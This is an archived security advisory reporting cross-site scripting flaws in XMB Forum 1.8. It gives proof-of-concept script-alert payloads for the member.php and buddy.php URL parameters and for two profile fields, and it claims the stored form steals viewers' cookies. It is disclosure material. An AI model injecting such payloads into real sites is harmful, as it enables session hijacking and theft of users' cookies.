TUCoPS :: Web BBS :: etc :: bt457.txt

Many XSS Vulnerabilities in XMB Forum. 




Many XSS Vulnerabilities in XMB Forum.

Program Name     : XMB Forum

AffectedVersion  : 1.8 Partagium (may be the newest version)

Home Page        : http://www.xmbforum.com

Author           : Knight Commander (at hackervn.net)



+Vul:

In this link:

http://pathto/XMBforum/member.php?action=viewpro&member=admin<script>alert

('XSS')</script>

and

http://pathto/XMBforum/buddy.php?action=<script>alert('XSS')

</script>&buddy=<script>alert('XSS')</script>

or in your profiles:

just fill in MSN and Current Mood 's text box: <script>alert('XSS')

</script>

when the others view your profiles, their cookies will be stolen.



Solution:

Vendor was contacted.The new version will be released soon.

Regards!

email: knight4vn@yahoo.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH